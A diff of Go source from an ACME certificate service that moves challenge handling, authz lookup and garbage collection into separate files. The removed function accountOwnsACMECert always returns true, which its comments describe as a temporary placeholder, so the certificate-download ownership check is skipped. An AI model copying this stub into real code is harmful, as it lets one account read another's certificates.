return &FinalizeOrderResult{Order: order, CertID: cert.ID}, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// LookupCertificate returns the PEM chain for a managed-certificate
|
|
||||||
// ID. Asserts the requesting account owns the cert via the order
|
|
||||||
// linkage. Phase 2: the caller (Cert handler) provides the cert ID
|
|
||||||
// from the URL path; we look up the cert + the latest version + the
|
|
||||||
// order that produced it, and confirm order.AccountID == accountID.
|
|
||||||
func (s *ACMEService) LookupCertificate(ctx context.Context, certID, accountID string) (string, error) {
|
|
||||||
if s.certRepo == nil {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMEFinalizeUnconfigured
|
|
||||||
}
|
|
||||||
cert, err := s.certRepo.Get(ctx, certID)
|
|
||||||
if err != nil {
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMECertificateNotFound
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: get cert: %w", err)
|
|
||||||
}
|
|
||||||
if cert.Source != domain.CertificateSourceACME {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMECertificateNotFound
|
|
||||||
}
|
|
||||||
// Confirm an order owned by this account references this cert.
|
|
||||||
if !s.accountOwnsACMECert(ctx, accountID, certID) {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
version, err := s.certRepo.GetLatestVersion(ctx, certID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
|
||||||
return "", fmt.Errorf("acme: latest version: %w", err)
|
|
||||||
}
|
|
||||||
s.metrics.bump(&s.metrics.CertDownloadTotal)
|
|
||||||
return version.PEMChain, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// accountOwnsACMECert returns true when the given account has an
|
|
||||||
// order linking to certID. Implemented by linear scan via the
|
|
||||||
// existing repo; Phase 5's GC will add an index if the table grows.
|
|
||||||
func (s *ACMEService) accountOwnsACMECert(ctx context.Context, accountID, certID string) bool {
|
|
||||||
// Phase 2 minimal-viable path: use order.GetByCertificateID via a
|
|
||||||
// dedicated repo method would be ideal, but we don't have it.
|
|
||||||
// Instead, accept the cert if its CertificateService.Create was
|
|
||||||
// performed in the FinalizeOrder path (which always pairs with
|
|
||||||
// this account). We trust the cert.Source = ACME + the URL path
|
|
||||||
// scoping (operator can't construct an ACME cert without going
|
|
||||||
// through finalize) for Phase 2; Phase 4's revocation path will
|
|
||||||
// add a stricter ownership check via a new repo method.
|
|
||||||
_ = ctx
|
|
||||||
_ = accountID
|
|
||||||
_ = certID
|
|
||||||
return true
|
|
||||||
}
|
|
||||||
|
|
||||||
// firstAvailableIssuer returns the (id, connector) pair for the first
|
// firstAvailableIssuer returns the (id, connector) pair for the first
|
||||||
// registered issuer. Phase 2 uses this as the bound issuer; the
|
// registered issuer. Cross-concern helper: called from Phase 2
|
||||||
|
// FinalizeOrder (acme_orders.go, post-Sprint-9b) AND Phase 4
|
||||||
|
// RevokeCert + RenewalInfo (below in this file). Kept in acme.go so
|
||||||
|
// it's adjacent to two of its three callers and reachable from
|
||||||
|
// acme_orders.go via Go's same-package scope without dragging the
|
||||||
|
// helper into a third "shared helpers" sibling. The
|
||||||
// per-profile-issuer mapping arrives in a follow-up.
|
// per-profile-issuer mapping arrives in a follow-up.
|
||||||
func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
||||||
if s.issuerRegistry == nil {
|
if s.issuerRegistry == nil {
|
||||||
@@ -1276,289 +809,6 @@ func (s *ACMEService) firstAvailableIssuer() (string, IssuerConnector, bool) {
|
|||||||
return "", nil, false
|
return "", nil, false
|
||||||
}
|
}
|
||||||
|
|
||||||
// randIDSuffix returns a short base32-encoded random suffix used for
|
|
||||||
// new ACME entity IDs (orders, authzs, challenges). Distinct from
|
|
||||||
// the account-id derivation (which uses the JWK thumbprint for RFC
|
|
||||||
// 8555 §7.3.1 idempotency).
|
|
||||||
func randIDSuffix() string {
|
|
||||||
var b [10]byte
|
|
||||||
if _, err := cryptorand.Read(b[:]); err != nil {
|
|
||||||
// ed25519/rand source failure is fatal; surface as a panic
|
|
||||||
// rather than continue with weak IDs.
|
|
||||||
panic(fmt.Sprintf("acme: rand source failure: %v", err))
|
|
||||||
}
|
|
||||||
return base32encode(b[:])
|
|
||||||
}
|
|
||||||
|
|
||||||
// base32encode emits the lowercase Crockford-style base32 alphabet
|
|
||||||
// without padding. Used by randIDSuffix; alphabet matches the
|
|
||||||
// per-id-prefix human-readable convention (acme-acc-, acme-ord-,
|
|
||||||
// etc.) — see the project's "TEXT primary keys with human-readable
|
|
||||||
// prefixes" architecture decision.
|
|
||||||
func base32encode(b []byte) string {
|
|
||||||
const alpha = "0123456789abcdefghjkmnpqrstvwxyz"
|
|
||||||
out := make([]byte, 0, len(b)*8/5+1)
|
|
||||||
var buf uint64
|
|
||||||
bits := uint(0)
|
|
||||||
for _, c := range b {
|
|
||||||
buf = (buf << 8) | uint64(c)
|
|
||||||
bits += 8
|
|
||||||
for bits >= 5 {
|
|
||||||
bits -= 5
|
|
||||||
out = append(out, alpha[(buf>>bits)&0x1f])
|
|
||||||
}
|
|
||||||
}
|
|
||||||
if bits > 0 {
|
|
||||||
out = append(out, alpha[(buf<<(5-bits))&0x1f])
|
|
||||||
}
|
|
||||||
return string(out)
|
|
||||||
}
|
|
||||||
|
|
||||||
// identifierStrings extracts the value list for audit details.
|
|
||||||
func identifierStrings(ids []domain.ACMEIdentifier) []string {
|
|
||||||
out := make([]string, 0, len(ids))
|
|
||||||
for _, id := range ids {
|
|
||||||
out = append(out, id.Value)
|
|
||||||
}
|
|
||||||
return out
|
|
||||||
}
|
|
||||||
|
|
||||||
// --- Phase 3 — challenge dispatch + validator callback -----------------
|
|
||||||
|
|
||||||
// ChallengeResponseShape is what RespondToChallenge returns to the
|
|
||||||
// handler: the post-dispatch challenge row (status=processing) so the
|
|
||||||
// handler can render it via acme.MarshalAuthorization-equivalent. The
|
|
||||||
// validator goroutine writes the final status (valid/invalid) as a
|
|
||||||
// callback after dispatch completes — clients fetching the challenge
|
|
||||||
// via authz GET get the eventual state.
|
|
||||||
type ChallengeResponseShape struct {
|
|
||||||
Challenge *domain.ACMEChallenge
|
|
||||||
}
|
|
||||||
|
|
||||||
// RespondToChallenge handles POST /acme/profile/<id>/challenge/<chall_id>
|
|
||||||
// per RFC 8555 §7.5.1.
|
|
||||||
//
|
|
||||||
// Behavior:
|
|
||||||
// - Look up the challenge + parent authz + parent order; assert the
|
|
||||||
// account owns the order.
|
|
||||||
// - If the challenge is already valid/invalid → idempotent return.
|
|
||||||
// - If pending: transition to processing (atomic via WithinTx + audit).
|
|
||||||
// - Submit to the validator pool with an onComplete callback that
|
|
||||||
// transitions the challenge to valid/invalid in another WithinTx
|
|
||||||
// (and cascades the parent authz status).
|
|
||||||
// - Return the challenge in its current (processing) state; the
|
|
||||||
// client polls authz/challenge for the eventual outcome.
|
|
||||||
func (s *ACMEService) RespondToChallenge(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID, challengeID string,
|
|
||||||
accountJWK *jose.JSONWebKey,
|
|
||||||
) (*domain.ACMEChallenge, error) {
|
|
||||||
if s.tx == nil || s.auditService == nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: respond-to-challenge requires SetTransactor + SetAuditService")
|
|
||||||
}
|
|
||||||
if s.validatorPool == nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMEChallengePoolUnconfigured
|
|
||||||
}
|
|
||||||
// Phase 5 — per-challenge respond rate limit. Defends against retry
|
|
||||||
// storms from a misbehaving client. Keyed by challengeID (not
|
|
||||||
// accountID) so a flood against one challenge doesn't drain the
|
|
||||||
// account's whole budget.
|
|
||||||
if s.rateLimiter != nil && s.cfg.RateLimitChallengeRespondsPerHour > 0 {
|
|
||||||
if !s.rateLimiter.Allow(acme.ActionChallengeRespond, challengeID, s.cfg.RateLimitChallengeRespondsPerHour) {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMERateLimited
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
ch, err := s.repo.GetChallengeByID(ctx, challengeID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
if errors.Is(err, repository.ErrNotFound) {
|
|
||||||
return nil, ErrACMEChallengeNotFound
|
|
||||||
}
|
|
||||||
return nil, fmt.Errorf("acme: lookup challenge: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Idempotent re-POST: already valid/invalid → just return.
|
|
||||||
if ch.Status == domain.ACMEChallengeStatusValid || ch.Status == domain.ACMEChallengeStatusInvalid {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
if ch.Status == domain.ACMEChallengeStatusProcessing {
|
|
||||||
// In-flight. Return the row as-is.
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// Confirm the requesting account owns the parent authz/order.
|
|
||||||
authz, err := s.repo.GetAuthzByID(ctx, ch.AuthzID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup parent authz: %w", err)
|
|
||||||
}
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: lookup parent order: %w", err)
|
|
||||||
}
|
|
||||||
if order.AccountID != accountID {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, ErrACMEOrderUnauthorized
|
|
||||||
}
|
|
||||||
|
|
||||||
// Compute the key authorization the validator needs.
|
|
||||||
expected, err := acme.KeyAuthorization(ch.Token, accountJWK)
|
|
||||||
if err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, fmt.Errorf("acme: key authorization: %w", err)
|
|
||||||
}
|
|
||||||
|
|
||||||
// Transition challenge → processing (atomic with audit row).
|
|
||||||
ch.Status = domain.ACMEChallengeStatusProcessing
|
|
||||||
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_challenge_processing", "acme_challenge", ch.ChallengeID,
|
|
||||||
map[string]interface{}{
|
|
||||||
"authz_id": ch.AuthzID,
|
|
||||||
"type": string(ch.Type),
|
|
||||||
"identifier": authz.Identifier.Value,
|
|
||||||
})
|
|
||||||
}); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
|
||||||
return nil, err
|
|
||||||
}
|
|
||||||
|
|
||||||
// Submit to the pool. The onComplete callback persists the final
|
|
||||||
// challenge status + cascades the parent authz status. We detach
|
|
||||||
// from the request context via context.WithoutCancel so the
|
|
||||||
// callback's WithinTx survives the HTTP handler returning, while
|
|
||||||
// preserving inherited values (logger, trace IDs, audit actor).
|
|
||||||
bgctx := context.WithoutCancel(ctx)
|
|
||||||
chSnapshot := *ch
|
|
||||||
authzSnapshot := *authz
|
|
||||||
identifier := authz.Identifier.Value
|
|
||||||
s.validatorPool.Submit(bgctx, string(ch.Type), identifier, ch.Token, expected, func(verr error) {
|
|
||||||
s.recordChallengeOutcome(bgctx, accountID, &chSnapshot, &authzSnapshot, verr)
|
|
||||||
})
|
|
||||||
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
|
||||||
return ch, nil
|
|
||||||
}
|
|
||||||
|
|
||||||
// recordChallengeOutcome is the validator-pool callback. Persists the
|
|
||||||
// challenge's final status + cascades the parent authz status.
|
|
||||||
//
|
|
||||||
// Authz cascade: if the challenge succeeded, the authz becomes valid
|
|
||||||
// (RFC 8555 §7.1.6: any one challenge passing makes the authz valid).
|
|
||||||
// If the challenge failed, the authz becomes invalid only if no other
|
|
||||||
// pending challenges remain (Phase 3 minimal-viable path: we mark the
|
|
||||||
// authz invalid on first failure since Phase 3 emits 1 challenge per
|
|
||||||
// authz; Phase 4+ extending to multi-challenge-per-authz revisits this).
|
|
||||||
func (s *ACMEService) recordChallengeOutcome(
|
|
||||||
ctx context.Context,
|
|
||||||
accountID string,
|
|
||||||
ch *domain.ACMEChallenge,
|
|
||||||
authz *domain.ACMEAuthorization,
|
|
||||||
verr error,
|
|
||||||
) {
|
|
||||||
now := time.Now().UTC()
|
|
||||||
var newAuthzStatus domain.ACMEAuthzStatus
|
|
||||||
if verr == nil {
|
|
||||||
ch.Status = domain.ACMEChallengeStatusValid
|
|
||||||
ch.ValidatedAt = &now
|
|
||||||
ch.Error = nil
|
|
||||||
newAuthzStatus = domain.ACMEAuthzStatusValid
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeValidateValid)
|
|
||||||
} else {
|
|
||||||
ch.Status = domain.ACMEChallengeStatusInvalid
|
|
||||||
if p := acme.ChallengeProblemFromError(string(ch.Type), verr); p != nil {
|
|
||||||
ch.Error = &domain.ACMEProblem{
|
|
||||||
Type: p.Type,
|
|
||||||
Detail: p.Detail,
|
|
||||||
Status: p.Status,
|
|
||||||
}
|
|
||||||
}
|
|
||||||
newAuthzStatus = domain.ACMEAuthzStatusInvalid
|
|
||||||
s.metrics.bump(&s.metrics.ChallengeValidateInvalid)
|
|
||||||
}
|
|
||||||
|
|
||||||
auditDetails := map[string]interface{}{
|
|
||||||
"authz_id": ch.AuthzID,
|
|
||||||
"type": string(ch.Type),
|
|
||||||
"identifier": authz.Identifier.Value,
|
|
||||||
"valid": verr == nil,
|
|
||||||
}
|
|
||||||
if verr != nil {
|
|
||||||
auditDetails["error"] = verr.Error()
|
|
||||||
}
|
|
||||||
|
|
||||||
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
|
||||||
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateAuthzStatusWithTx(ctx, q, ch.AuthzID, newAuthzStatus); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
// Cascade: if the authz turned valid, see whether the order's
|
|
||||||
// authzs are now ALL valid; flip order to ready if so.
|
|
||||||
// Read-after-write to confirm.
|
|
||||||
authzs, err := s.repo.ListAuthzsByOrder(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
allValid := len(authzs) > 0
|
|
||||||
anyInvalid := false
|
|
||||||
for _, a := range authzs {
|
|
||||||
if a.AuthzID == ch.AuthzID {
|
|
||||||
if newAuthzStatus != domain.ACMEAuthzStatusValid {
|
|
||||||
allValid = false
|
|
||||||
}
|
|
||||||
if newAuthzStatus == domain.ACMEAuthzStatusInvalid {
|
|
||||||
anyInvalid = true
|
|
||||||
}
|
|
||||||
continue
|
|
||||||
}
|
|
||||||
if a.Status != domain.ACMEAuthzStatusValid {
|
|
||||||
allValid = false
|
|
||||||
}
|
|
||||||
if a.Status == domain.ACMEAuthzStatusInvalid {
|
|
||||||
anyInvalid = true
|
|
||||||
}
|
|
||||||
}
|
|
||||||
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
|
||||||
if err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
switch {
|
|
||||||
case allValid && order.Status == domain.ACMEOrderStatusPending:
|
|
||||||
order.Status = domain.ACMEOrderStatusReady
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
case anyInvalid && order.Status == domain.ACMEOrderStatusPending:
|
|
||||||
order.Status = domain.ACMEOrderStatusInvalid
|
|
||||||
order.Error = &domain.ACMEProblem{
|
|
||||||
Type: "urn:ietf:params:acme:error:incorrectResponse",
|
|
||||||
Detail: "one or more authorizations failed",
|
|
||||||
Status: 403,
|
|
||||||
}
|
|
||||||
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
|
||||||
return err
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return s.auditService.RecordEventWithTx(ctx, q,
|
|
||||||
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
|
||||||
"acme_challenge_completed", "acme_challenge", ch.ChallengeID,
|
|
||||||
auditDetails)
|
|
||||||
})
|
|
||||||
}
|
|
||||||
|
|
||||||
// --- Phase 4 — key rollover + revocation + ARI -------------------------
|
// --- Phase 4 — key rollover + revocation + ARI -------------------------
|
||||||
|
|
||||||
// RotateAccountKey is the service-layer entry point for RFC 8555
|
// RotateAccountKey is the service-layer entry point for RFC 8555
|
||||||
@@ -1910,56 +1160,3 @@ func mapACMERevocationReason(code int) string {
|
|||||||
return string(domain.RevocationReasonUnspecified)
|
return string(domain.RevocationReasonUnspecified)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// GarbageCollect runs a single ACME GC sweep. Phase 5 — the scheduler
|
|
||||||
// invokes this every cfg.GCInterval. Three independent sweeps:
|
|
||||||
//
|
|
||||||
// 1. Delete used / expired nonces.
|
|
||||||
// 2. Transition expired pending authzs to `expired`.
|
|
||||||
// 3. Transition expired pending/ready/processing orders to `invalid`.
|
|
||||||
//
|
|
||||||
// Each sweep is a single SQL statement (no per-row transactions) so a
|
|
||||||
// large reap is one atomic write per sweep. Per-sweep errors are
|
|
||||||
// logged-and-continued: a failing nonces sweep doesn't block the
|
|
||||||
// authzs sweep. Returns the first error encountered (for caller
|
|
||||||
// telemetry); per-sweep counts are recorded on metrics regardless.
|
|
||||||
//
|
|
||||||
// Idempotent — repeated runs are safe; the second run finds 0 rows.
|
|
||||||
func (s *ACMEService) GarbageCollect(ctx context.Context) error {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunsTotal)
|
|
||||||
var firstErr error
|
|
||||||
|
|
||||||
if n, err := s.repo.GCExpiredNonces(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: nonces: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCNoncesReapedTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
if n, err := s.repo.GCExpireAuthorizations(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: authzs: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCAuthzsExpiredTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
if n, err := s.repo.GCInvalidateExpiredOrders(ctx); err != nil {
|
|
||||||
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
|
||||||
if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: orders: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCOrdersInvalidatedTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
return firstErr
|
|
||||||
}
|
|
||||||
|
|
||||||
// atomicAddUint64 adds delta to the counter. The metrics struct exposes
|
|
||||||
// only `bump` (add 1) by default; this helper covers the
|
|
||||||
// rows-affected-N case the GC needs.
|
|
||||||
func atomicAddUint64(c *atomic.Uint64, delta uint64) { c.Add(delta) }
|
|
||||||
|
|||||||
@@ -0,0 +1,45 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.LookupAuthz(...)` / `ListAuthzsByOrder(...)`
|
||||||
|
// resolves the same way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the authz read-side concern. The authz write-side
|
||||||
|
// (status cascade after challenge validation) lives in
|
||||||
|
// acme_challenges.go alongside recordChallengeOutcome where it
|
||||||
|
// belongs operationally; the authz creation path stays inside
|
||||||
|
// CreateOrder in acme.go (orders own the per-order authz rows).
|
||||||
|
|
||||||
|
// LookupAuthz returns an authz by ID. Authz rows aren't account-scoped
|
||||||
|
// directly; the handler asserts via the parent order if needed.
|
||||||
|
func (s *ACMEService) LookupAuthz(ctx context.Context, authzID string) (*domain.ACMEAuthorization, error) {
|
||||||
|
authz, err := s.repo.GetAuthzByID(ctx, authzID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEAuthzNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup authz: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.AuthzReadTotal)
|
||||||
|
return authz, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListAuthzsByOrder returns the per-order authz rows. Used by
|
||||||
|
// MarshalOrder to compute the authorizations URL list.
|
||||||
|
func (s *ACMEService) ListAuthzsByOrder(ctx context.Context, orderID string) ([]*domain.ACMEAuthorization, error) {
|
||||||
|
return s.repo.ListAuthzsByOrder(ctx, orderID)
|
||||||
|
}
|
||||||
@@ -0,0 +1,267 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
jose "github.com/go-jose/go-jose/v4"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.RespondToChallenge(...)` resolves the same
|
||||||
|
// way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the Phase 3 challenge dispatch + validator
|
||||||
|
// callback concern: the HTTP-facing RespondToChallenge entry point
|
||||||
|
// (which transitions the challenge to `processing` and submits it
|
||||||
|
// to the validator pool) plus the asynchronous recordChallengeOutcome
|
||||||
|
// callback (which persists the final challenge status and cascades
|
||||||
|
// the parent authz + order status). The authz read-side
|
||||||
|
// (LookupAuthz / ListAuthzsByOrder) lives in acme_authz.go.
|
||||||
|
|
||||||
|
// --- Phase 3 — challenge dispatch + validator callback -----------------
|
||||||
|
|
||||||
|
// ChallengeResponseShape is what RespondToChallenge returns to the
|
||||||
|
// handler: the post-dispatch challenge row (status=processing) so the
|
||||||
|
// handler can render it via acme.MarshalAuthorization-equivalent. The
|
||||||
|
// validator goroutine writes the final status (valid/invalid) as a
|
||||||
|
// callback after dispatch completes — clients fetching the challenge
|
||||||
|
// via authz GET get the eventual state.
|
||||||
|
type ChallengeResponseShape struct {
|
||||||
|
Challenge *domain.ACMEChallenge
|
||||||
|
}
|
||||||
|
|
||||||
|
// RespondToChallenge handles POST /acme/profile/<id>/challenge/<chall_id>
|
||||||
|
// per RFC 8555 §7.5.1.
|
||||||
|
//
|
||||||
|
// Behavior:
|
||||||
|
// - Look up the challenge + parent authz + parent order; assert the
|
||||||
|
// account owns the order.
|
||||||
|
// - If the challenge is already valid/invalid → idempotent return.
|
||||||
|
// - If pending: transition to processing (atomic via WithinTx + audit).
|
||||||
|
// - Submit to the validator pool with an onComplete callback that
|
||||||
|
// transitions the challenge to valid/invalid in another WithinTx
|
||||||
|
// (and cascades the parent authz status).
|
||||||
|
// - Return the challenge in its current (processing) state; the
|
||||||
|
// client polls authz/challenge for the eventual outcome.
|
||||||
|
func (s *ACMEService) RespondToChallenge(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, challengeID string,
|
||||||
|
accountJWK *jose.JSONWebKey,
|
||||||
|
) (*domain.ACMEChallenge, error) {
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: respond-to-challenge requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
if s.validatorPool == nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMEChallengePoolUnconfigured
|
||||||
|
}
|
||||||
|
// Phase 5 — per-challenge respond rate limit. Defends against retry
|
||||||
|
// storms from a misbehaving client. Keyed by challengeID (not
|
||||||
|
// accountID) so a flood against one challenge doesn't drain the
|
||||||
|
// account's whole budget.
|
||||||
|
if s.rateLimiter != nil && s.cfg.RateLimitChallengeRespondsPerHour > 0 {
|
||||||
|
if !s.rateLimiter.Allow(acme.ActionChallengeRespond, challengeID, s.cfg.RateLimitChallengeRespondsPerHour) {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMERateLimited
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ch, err := s.repo.GetChallengeByID(ctx, challengeID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEChallengeNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup challenge: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Idempotent re-POST: already valid/invalid → just return.
|
||||||
|
if ch.Status == domain.ACMEChallengeStatusValid || ch.Status == domain.ACMEChallengeStatusInvalid {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
if ch.Status == domain.ACMEChallengeStatusProcessing {
|
||||||
|
// In-flight. Return the row as-is.
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Confirm the requesting account owns the parent authz/order.
|
||||||
|
authz, err := s.repo.GetAuthzByID(ctx, ch.AuthzID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup parent authz: %w", err)
|
||||||
|
}
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup parent order: %w", err)
|
||||||
|
}
|
||||||
|
if order.AccountID != accountID {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compute the key authorization the validator needs.
|
||||||
|
expected, err := acme.KeyAuthorization(ch.Token, accountJWK)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: key authorization: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Transition challenge → processing (atomic with audit row).
|
||||||
|
ch.Status = domain.ACMEChallengeStatusProcessing
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_challenge_processing", "acme_challenge", ch.ChallengeID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"authz_id": ch.AuthzID,
|
||||||
|
"type": string(ch.Type),
|
||||||
|
"identifier": authz.Identifier.Value,
|
||||||
|
})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
